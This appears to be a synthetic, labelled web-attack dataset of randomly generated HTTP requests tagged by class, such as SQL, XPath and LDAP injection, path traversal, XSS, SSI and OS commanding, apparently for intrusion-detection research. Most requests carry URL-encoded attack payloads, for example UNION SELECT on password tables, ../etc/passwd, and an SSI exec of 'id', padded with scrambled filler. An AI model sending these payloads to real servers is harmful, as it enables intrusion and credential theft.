User-Agent: <!--#email fromhost="www.mSiqwou.com" tohost="mailbox.nvf.com" message="sdee lettneZ hcyas lsi" fromaddress="ewoolu.com" toaddress="msa.ajnu.com" subject="i" sender="ht.com" replyto="rkhint.com" cc="pYd" inreplyto="ef3 duI sr" id="r7fttmail" -->
UA-CPU: 68000
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8070x422

dEh5=7&9pgCprocessing-instructioninR36@O=23195&sta55Lcmhe2pm=i~a&DAt=ieOI&tweprNie=owsmdiqteo&ke=mAeA(ia:eO at3&jiiadEaameF=Isfcm2azT;d&0daemn=eO4rYWwpF3&VGKZJ=Aserboevit=irf&tiaaIyoaC0fa5at=eh

End - Id: 39478
Start - Id: 42655
class: SqlInjection
GET /eDw0dxqfRPCcBHS8t/PYVtt0SxxllZu.jpg?ZQQ85A=8500241&otVRsNciAkCaae=2Uie&atnwT=38839&gtre6eRf8=38544948&ih=iy&fzdessu=%27union++select++++PASSWORD++from++DBA_PASSWORD%3B--&hm=ttloshEtresf8namw&likeMUjn=5i9iIDpTXhr&gy=f5hJcR_hqJH%40 HTTP/1.1
Host: www.ocymiia.cz:80
Connection: close
Accept: text/html, image/png, image/gif
Accept-Charset: macintosh, x-mac-korean;q=0.4
Accept-Encoding: identity;q=0.9, identity;q=0.7, gzip, identity;q=0.2
Accept-Language: ee-8aos, s-hcaoSean;q=0.8, tes-nhHiiaUs;q=0.3
Cache-Control: sp='Btop'
Client-ip: 105.23.255.119
Cookie: qq1ha2ftaaao=8229;z1EMR=i6OEP.2uc;ehO=9;rubdaonj9ojgp=ijaunsop~jttni
Cookie2: $Version="8"
Date: Wed, 14 Sep 05 17:32:54 GMT
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Mon, 30 Nov 09 18:31:36 GMT
If-Unmodified-Since: Wed, 26 Jul 06 05:27:54 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 6264
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nc=df77Ceae
Range: 339-5245,-077063
Referer: /ut7mai.js
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/8.9 (compatible; ebwsmsqE; WinNT; u2nk; r9neik; aediL2is)
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: deflate
Upgrade: fo6/1.0, ozs/3.7, re3mNl/0.5, osie/6.9
Warning: 589 203.56.73.253 "n545" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 593816636340415
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42655
Start - Id: 49042
class: XPathInjection
GET /jwLtsnd1tmlyi/rrS6oOstelrq/pIVKgGkjpug1/hiu0sP/shO/peUi.js?IEgYncpdvartFYa=%7C&camtuss=%7C7wIomsaSeer2i&pDfT=orAtnK&a9af=ov&dei=bgv2%27+or+%28i+++%3C++++count%28reegOd%2Fchild%3A%3Atext%28%29%29+and++++j+%3C+++++count%284ogR%2Fchild%3A%3Acomment%28%29%29++++and+k+%3C+count%283telf%2Fchild%3A%3A*%29+++++%29+++++or+%27hfdtizi3%27++%3D%27++ern7%27+or&D0@deleteNP=rR&alrPFsmfeaTinee=5257399632 HTTP/1.1
Host: www.twt7r2.uk
Connection: arlsaa
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate, deflate
Accept-Language: qntrxteI-eosng, usu7-faMqaate;q=0.2, dEe4er3E-a, g-di, 3-i5eaept
Cache-Control: no-cache
Client-ip: 23.215.109.9
Cookie: ohfe3ihdkihz=adDVt72;N2HQZM=491685737;n7npahtrel=x$+;pe=5MBh;ao3chlhbtkredn=61793;lieolbdODswrTt=goytipcnanhhh
Cookie2: $Version="182"
Date: Thu, 18 Jan 07 19:33:29 CET
ETag: W/"RWRewLZE@ByZlVH@yVU"
Expect: oatrmt=Wctate;wmnin=mhlrmayt
From: omlrams@dneneIeea.de
If-Modified-Since: Sun, 25 Oct 09 07:43:06 GMT
If-Unmodified-Since: Sat, 12 Aug 06 21:06:16 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Apr 05 14:49:48 GMT
Max-Forwards: 6
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Digest realm
Range: -31
Referer: /1cratg/aepli/ytttpte6.msf
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: hL8snage (sVl1UL; rVYtd0upZ-; atDfNaKyVl)
UA-CPU: StrongARM
UA-Disp: 792,0293,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1840x9062
Via: 0.8 www.4didh7.css
Transfer-Encoding: tird; sacha=mnhot
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 688 135.98.248.226 "d8an8" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49042
Start - Id: 38365
class: LdapInjection
GET /leiosat2O7Odt/winntt/g8Q/65mcukfctzrGee.gif?mleC=ltfromqsdnphpava&il7m=p+Ir&ijun6sAeeRv=bqGNc_&emoNi=tvv0&sH7arreap=6&wngf9Tmkpitm=843561219&mdnEnlrodalea=%29++++%28+++%7C+%28+cn%3D*o+%27brien*+++%29%28mail%3D*o++++%27brien*+++%29+++&elnfkeu=%25i%5Dr%29na8emailkrtsstuzs&vDo6=er&oep=0Fsebrc6%3Biwp-&nsafep=tUkI2sdl&erpwFarabqtwOd=srAnHMegss3&Eteleaas=%5Bre HTTP/1.0
Host: 79.59.142.34
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-korean, iso-8859-15;q=0.5, macintosh, euc-kr;q=0.8, macintosh
Accept-Encoding: gzip;q=0.6, compress, compress, identity, deflate;q=0.8
Accept-Language: zleshl-9n51ogt;q=0.2, Njes-vPSesrtm
Cache-Control: min-fresh=45
Client-ip: 193.201.183.61
Cookie: xyCVBtzCukE=alttgzlocationsebt:jSiphp5d'3;jdn6=tt srt i;9ZrmautoexecY-51y=398293;AoLTlcrsnd=htaccesMh'htvbscripttelnetyStsk
Cookie2: $Version="3"
Date: Tue, 27 Jan 09 04:50:49 CET
ETag: W/"ZyekoH8b5pnAccaIUM@"
Expect: 100-continue
From: 4gilTpo@eharkyeenl.cz
If-Modified-Since: Fri, 27 Feb 04 02:01:10 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 39
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: Digest cnonce="essay"
Range: 84-89,256260-35,5-
Referer: http://ejuq.ch/ea5ssrp/teaoerin/swtshl.php
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 3.3; on-df; rv:8.8.8) Gecko/30670394
UA-CPU: 68000
UA-Disp: 6003,793,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 8.2 www.nxQa2r.js
Transfer-Encoding: gzip
Upgrade: ooh/1.6, rCeq/8.8
Warning: 242 www.rnh0htla.jpg:8 "nyednaRaaanaige" "Wed, 12 Mar 08 13:13:41 GMT"
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38365
Start - Id: 45665
class: PathTransversal
GET /n@N/fwinnnmzgA/utonrwgerd6ornefl5l/718lDadqEht6e/84wPhWgiw/Bn3s7erxs8n/dNZNuFOT0PNZ8ZjVh-/ntd5r/so/ngt9thtsanthdeo/rpghgrlvlNn.htm?nkq=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&eo=Alx HTTP/1.0
Host: www.tkvaaa.org:47875
Connection: dyeee
Accept: */*
Accept-Charset: iso-2022-jp;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: t89eOid-ao, lC-leobeoma, to-bnefonn, 3vlaNsi-sk, siviyhe-ocm;q=0.2
Cache-Control: ht='Ahoeefj'
Client-ip: 10.24.0.201
Cookie: abhtfI=A;pitimt=lud8pii;au06cDey0=kFsoyrsfei9e hc;vunberdsas=scpJU-mca
Cookie2: $Version="46"
Date: Sun, 06 Apr 08 23:14:26 CET
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 25 Aug 05 08:10:44 UTC
If-Unmodified-Since: Sun, 16 Nov 08 16:28:08 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jul 05 11:20:49 UTC
Max-Forwards: 49
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest qop=teco
Range: 92916-
Referer: http://eouhm.it/weiemles.exe
TE: gzip;q=0.3
Trailer: Cache-Control
User-Agent: rp4FnIXf http://www.n57d.ch
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: n1ns
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 291 www.olf39o.jpg "uhsenbent4l" "Tue, 24 Jan 06 02:46:29 UTC"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45665
Start - Id: 47305
class: XSS
GET /4fc68udesigsa/0WoKbgsound1or/Nt/kne7ana5hetnbeuvsn/teifYeshadbu/c.k@dC.aVvya/5MvSiiIkQo@T-K/shuoioeatf/rnow1/Tvvreeelsry0t/ga2sbdaolo4laacossi/efihchnsroAoz.nsf?a2GuQ=rvar%2Fiag%3Dchildewne&ftaNTio=deiaeiophIS55epone&wtebar=dx9O33E&9rnynacaeisui=iLakir+++++%22++++++++style%3Dleft%3Aexpression%28alert%28%22+++sboBSl.h0a7+++++%22%29%29++alt++++%3D+++%22&ie0=6391 HTTP/1.0
Host: 223.118.49.81
Connection: 1inygm
Accept: image/gif, video/*, application/postscript;q=0.3
Accept-Charset: utf-8;q=0.7, x-mac-arabic, ks_c_5601-1987;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=8681
Client-ip: 104.102.195.181
Cookie: rrirRhRd=4gtp+o
Cookie2: $Version="81"
Date: Sat, 08 Jul 06 09:19:32 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: Aaog
From: told@ol9na.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Sat, 23 May 09 21:42:32 UTC
If-Match: *
If-None-Match: "_xafT1FZA3sPDfocKFso"
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 8994
MIME-Version: 0.1
Pragma: ep5te=pe08
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: -40347,67-1
Referer: http://www.7eTI4as.org/Srmi/Ortoe.gif
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.0 (compatible; hrlsgjpqtI; WinNT; ptReh0; iaaIbtsaG)
UA-CPU: Sparc
UA-Disp: 557,9358,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 5.9 57.244.44.116
Transfer-Encoding: deflate
Upgrade: te4gye/2.3, elsad/9.1, hedM/8.6, a0ndP/0.7
Warning: 444 214.91.5.142:2 "utenrsgvrEdai" 
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47305
Start - Id: 46339
class: PathTransversal
GET /titu0n7dcbejd4/eTDn8O/Veonm3c/uLaeLo3ciegegn/5tpd6tsD5edp/cDIMMgkecBXM.html?hbzN5-Uq=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fmy.conf&AandnlQhUVxshutdownh=l4k9tseae0ywebetweend&h6ne=74828439&2rxsm=suniFetdaAtb%3C&8risdenet=Gee&adgtmibEosit=esr&1vs4fltm=+Bupdate%2Fafhtpassno5&ephddio2ei=0425187&dyo3eacs=f&eetst=p%26rg&aol4mtc=apttfdntlie%3Berk&el=dr HTTP/1.1
Host: 162.24.126.118
Connection: b6nt2
Accept: */*
Accept-Charset: iso-8859-9, x-mac-chinesesimp, iso-2022-jp;q=0.0
Accept-Encoding: gzip, deflate, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 142.8.138.99
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="16"
Date: Sun, 04 May 08 09:14:44 UTC
ETag: "GqBiplHCipnTB_JNhgiU"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Tue, 30 Jun 09 12:32:14 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "1B.ht9QPm7xAQS1bDZD"
If-None-Match: *
If-Range: Sun, 16 May 04 02:57:59 CET
Max-Forwards: 1959
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: josyh eeusucc9=tlhwlepi
Authorization: enntc5 u4t9=Csgeye
Range: -282967,968090-1346,1029-352
Referer: http://Yasn.it/hc1w/e0Tohhoo/er7zi/ekUehdh.html
TE: trailers,deflate;q=0.1,trailers
Trailer: If-None-Match
User-Agent: hsTK13 http://www.gldeWtn.gov
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3713x610
Via: 5.0 www.aj70ien.gif, HTTP/6.8 140.239.252.219, HTTP/5.1 186.107.254.38:997
Transfer-Encoding: compress
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 33688817267765601
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46339
Start - Id: 35680
class: XPathInjection
GET /iaZr/rHW9_.tbMwizkV/foIsDwHfb3e/aq8z1G9q6PVPrI2wSsm/radVYg/Kha/2@xz1x/nykvJX7Nr/tehHtSnjivbRbuy/dEDNuwlDq/aJlxz.jsp?QRI5KqiiO5t=47071&EIkNnull=653877&aDMR3=NoC%27++or+++6+++%3C++++count%28path%2Fchild%3A%3A*%29+or++%27lio3iior%27%3D++%27&Xj8position=005&xPioNetaawl=inose+&gvd=iotmnl4d&access_logsysteme1eX=wt6ibzt&weafundoztoyty=773 HTTP/1.0
Host: 191.195.179.99
Connection: close
Accept: image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: att-sthl, ge-fh6;q=0.8
Cache-Control: max-age=938
Client-ip: 68.97.141.43
Cookie: srirAeae=i~ntee0h;lZ30u=xmt ipmo=eer;cz7_8opt2Z_1=643355;T636F=8969
Cookie2: $Version="063"
Date: Mon, 19 Jun 06 21:58:28 CET
ETag: "isp-3O2gHWlDZdaAXSs"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Mon, 01 Aug 05 11:41:41 CET
If-Unmodified-Since: Thu, 30 Sep 04 09:19:58 GMT
If-Match: "6Zc0t_nb7p0vZsKvoUtM"
If-None-Match: *
If-Range: *
Max-Forwards: 780
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="tghlh"
Authorization: NTLM aHRlZ2VLaGFyd2F3ZHNyaWVjZXJvc050NXRmbXRodXZFcExueGJld3lrbnJlc24=
Range: -82,-22
Referer: http://c3sfisoi.be/rgaw/hhum/FAnkem/izgStao.pdf
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: From
User-Agent: feSuFoM8mP http://www.e6efaRcg.it
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 7.0 36.212.132.246
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 785 www.etlLs.css:3 "mryaear9up1NyIone0" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35680
Start - Id: 35348
class: SqlInjection
GET /uJvoBS.pl?BA_wcfeHXDT5=em%27%2F**%2FUNION%2F**%2FSELECT%2F**%2Fhigaxde0%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Ffw%2F**%2Flike%2F**%2F%27%2525&HEtIS7sKgfO=029297545&ei=lswosnltEpasswdnaepa&jucAmt=50&Y0m4=e0HQ1&hsItAnou2o6qvoe=oRD_cr&eLwtt6zeatdr=b3thR HTTP/1.1
Host: www.eeeieee.it:80
Connection: ntu1E
Accept: text/*;q=0.7, audio/x-wav;q=0.1
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: Fngw-ec5nwaa, oUeAod7-L
Cache-Control: no-store
Client-ip: 109.249.213.197
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="398"
Date: Tue, 08 Jun 04 09:06:53 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Sun, 15 Jan 06 19:48:25 CET
If-Unmodified-Since: Sat, 28 May 05 18:50:44 UTC
If-Match: "r5-JcxehE716_Os"
If-None-Match: "-uqYDHE9a_WSrKMxX"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 8
MIME-Version: 4.3
Pragma: tWh12sdl='ecsaatl'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: NTLM YW9tZWk4TnRlRW11ZW9tdGVldHNwb3JlOGVoYTdhd3Ri
Range: 1609-18413
Referer: /il3m/teriOr/unr3xtZa/xtntenoc/aeCrrd.fgf
TE: deflate;q=0.0,trailers,gzip;q=0.7
Trailer: Cache-Control
User-Agent: e_c51iX_X http://www.otooEcc.fr
UA-CPU: 68000
UA-Disp: 8257,8417,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 4.0 56.13.232.214
Transfer-Encoding: compress
Upgrade: gerh/9.6
Warning: 990 www.iarai.html:3656 "ttstnoOdn" "Mon, 11 Sep 06 03:23:34 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35348
Start - Id: 40182
class: SSI
GET /hTobjectPy_HjRdn/9ndo5atiSUerm/TehraeoaNa/Thhot9ttrOlecu.gif?nvi7q9fuPleg=nme1asn&om9ryf=ilozHRzxZ6.g&dtasScl=8759544&oveiot7ssthBp=%3C%21+%23%3C%21--+++%23exec++++cmd%3D%22id%22--%3E&ftictPkeepmhnOr=cooltn+%7Enw%40 HTTP/1.0
Host: 187.30.73.182
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.4, gzip;q=0.4, gzip
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 17.170.14.186
Cookie: DVF6bsamr=saTMlE
Date: Thu, 15 Dec 05 04:41:46 UTC
ETag: "Nu2YvJKiO9KZaKw5L2E"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Sun, 15 Mar 09 15:23:15 UTC
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 420
Proxy-Authorization: i3sd nmHattte=Gnylo
Authorization: Digest nc=ac4Fa0bE
Referer: http://owrsp.ch/Ghwkbrc/iwre2mon/iolrdaz/hoenzeo/rhesiePh.css
TE: gzip;q=0.1
User-Agent: acae (uBK6GAsz; 4QCEcfb)
Transfer-Encoding: compress
Upgrade: adn/7.5
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40182
Start - Id: 46391
class: PathTransversal
GET /k.YI5P/enIniINrrrgyt.aspx?ra=4e7emol&9I=787&deasiasweF=%28hetuyIuku&atemaMolhg6n9e=cmvmsp2jte&eb6zgbu8oheAsg5=aS7oHLHOW41Y&fsock_streamLKsFul=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&TY-Z=n&3aNsoiytqr=lw%5Dk&nSzlzeutass=oiat&N5os=3447920 HTTP/1.1
Host: 99.153.46.230
Connection: keep-alive
Accept: text/plain;q=0.6, text/html;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress, gzip;q=0.6, deflate;q=0.5
Accept-Language: z0nnfur-UsiaRts, ud3ljiba-wc
Cache-Control: min-fresh=682
Client-ip: 23.79.216.68
Cookie: d2rgi4A3d=eoe?;iern0st=U9t;9jD4uHbyA=uDi.z2.tfdx
Cookie2: $Version="7"
Date: Tue, 17 Oct 06 01:13:28 UTC
ETag: "czRVU2EQu08Bd1sb"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Fri, 16 Jul 04 01:14:50 UTC
If-Unmodified-Since: Fri, 17 Apr 09 23:09:11 GMT
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Mon, 06 Oct 08 07:40:08 GMT
Max-Forwards: 17
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest nonce
Range: 724-
Referer: http://www.araogs.it/eisz/aolMobda/fhntd/e3ege/oynr.swf
TE: gzip,trailers,deflate;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/3.6 (Windows; U; Win98 0.4; 8d-aj; rv:1.9.2) Gecko/56249415
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3216x516
Via: 5.8 www.Naoc.tiff
Transfer-Encoding: 1ebuea
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
X-Serial-Number: 75398657
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46391
Start - Id: 37441
class: LdapInjection
GET /W0dYS/rnNyloT.5rX/rP/sDGovgc_OMG6UlaiRWJ/rorawmmotsa/aDK0gyuqjGsEK/S2atO3/pslaettqedi5pee/ssdsru/ml.swf?hdoitgeozj=SQaptey&xv=sI%28%5Cu&reteuoTgeresxe=62&esrdhbhmtds=or_ePOjiGGKf&aipj=bl&hntayrres3Mrgr=15&aue1rdaNyiEtnng=27281248&7rk=%27aptelnetsn&ezisuai9ERALrUt=ulm5rrel%3Aohandt5fwnwp-oi&0ex3iiwehfri=sfCAHJV&Y-phnL.Khk=466&itOmtd8H=iuCjdR&Nyilrit=733361 HTTP/1.1
Host: 215.226.74.184:8
Connection: close
Accept: */*;q=0.5
Accept-Charset: isiri-3342;q=0.9
Accept-Encoding: gzip, identity
Accept-Language: *
Cache-Control: max-age=19
Cookie: ataain=548)(&(objectClass=slM)(|(sn  =  tn)(cn=srm    J*))
Date: Sat, 11 Oct 08 21:57:07 GMT
If-Modified-Since: Sun, 10 Jan 10 23:29:28 UTC
If-Range: Fri, 16 Apr 04 06:09:07 UTC
Max-Forwards: 5234
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic TmJzaDpoc3NS
Referer: http://www.hlqat.net/rncir/bg0t.php4
User-Agent: Mozilla/6.1 (Windows; U; WinNT 7.9; Be-an; rv:6.8.8) Gecko/82669640
UA-Pixels: 654x386
Via: Rs0/2.7 39.133.156.176
Transfer-Encoding: compress
----: ------------------------------------------

null

End - Id: 37441
Start - Id: 47833
class: XSS
GET /qn5QIhid/u7XfU/ceg/nVWkWPWMD/q_mWJpe/Xc/naihorSt/cp1ivn/cr0trtrtweonasbis/fvhjd/s46FXeiti36/l2JY8.sh?qbCup=tL_X&ousdehz6t=rapperlnwsunnh&-K79Vty=6596174765&Hz9K6=2047&hesaleere=0&7s3gghmeaaB=%3Cbgsound++++src%3D++%22++javascript%3A+++%5Balert++%28%27TdbI3mtE%27%29%3B%5D%22++++%3E&LElpj1XstdinNetcp=98600&rategl=hra%29A&AVcmdFtLRNPl@=tsc HTTP/1.0
Host: www.et1te6jotc.st
Connection: clIaqe
Accept: video/*
Accept-Charset: iso-8859-4, windows-1253
Accept-Language: niteIrs-mul1sd
Cache-Control: max-stale=435
Cookie: 0n=1148209;lTamntl3dt=tPptL1vD;cgEenhdde7o35u=nute9Aul;Thknecgt=1933
Date: Mon, 12 Jan 09 05:45:42 GMT
Referer: /ifvw/cdaNVe/onosEUkc.txt
User-Agent: iNitasoyQc/2.5.8.0
Via: Edun/6.1 www.o40gondl.js:139, 3.1 www.TgTh.css
Transfer-Encoding: deflate

null

End - Id: 47833
Start - Id: 39319
class: SSI
GET /dbmar7eZN1IH/ywiiumh/LJSfadY/nolnshhBifn50tazach/BYmLK@/en6lee/nILlJ3V5wiFKhKtLlt/k6eVKWoeboGyZDzWIjhO.tiff?rn=geoy&AlSb9sEnfrYsd=577496&yhS=orT&etEaee=%3C%21--%23email+fromhost%3D%22www.rhizde.com%22+tohost%3D%22mailbox.lun9u.com%22+message%3D%22oeso+nchoch+otfrztht+laoone%22+fromaddress%3D%22freh.com%22+toaddress%3D%22htkcd.Kl48mo.com%22+subject%3D%22ghr%22+sender%3D%22D2.com%22+replyto%3D%22mrlma.com%22+cc%3D%22me%22+inreplyto%3D%22dane+ua0i+e23wis%22+id%3D%22Anmail%22+--%3E&Cun6ei9tIE=t+6&lePvl=lmbCnTjUDA&Tb1u=t9MO5&-lCNregL=89142&zoAtsa=hy&eTfoen=uo9iw&mtrNwpteoseIle=p&01stiaajE=02 HTTP/1.0
Host: 82.161.144.91
Connection: keep-alive
Accept: image/*, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uieb-rmohiD;q=0.6, ievjaV-3, 5B-ohrncdy;q=0.5, eij0edia-ose;q=0.9, my87-omNtisoa;q=0.0
Cache-Control: no-store
Client-ip: 11.92.216.73
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="904"
Date: Mon, 23 Jan 06 12:20:22 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: 100-continue
From: iltesrft@iaCi.uk
If-Modified-Since: Wed, 23 Dec 09 09:17:33 GMT
If-Unmodified-Since: Thu, 18 Dec 08 19:45:20 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 03:18:49 CET
Max-Forwards: 6
MIME-Version: 9.8
Pragma: ir6oae='Nrxln'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: http://imreMtn.ch/ethof/siacfz.doc
TE: deflate,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 4.8; pf-os; rv:5.8.1) Gecko/99612411
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: inler
Upgrade: eseht/3.5, trmE/1.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 802337450581
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39319
Start - Id: 44251
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.rredah.org
Connection: rnseihIi
Accept: */*;q=0.7
Accept-Charset: euc-kr
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: Acwta='nncutitc'
Client-ip: 182.20.30.117
Cookie: s54iee9eqeu=giifat5el6ns;tChBiasai1sd4pn=ti$r;wmhet=A>Ot1Anb[;thSyiu08Lst=2;cumoy5qd=uiq;vohn=6185062697
Cookie2: $Version="03"
Date: Sat, 06 Dec 08 12:19:10 GMT
ETag: "tuLT6v@wLJeEsjmz"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Wed, 17 Jan 07 06:35:09 UTC
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: *
If-None-Match: *
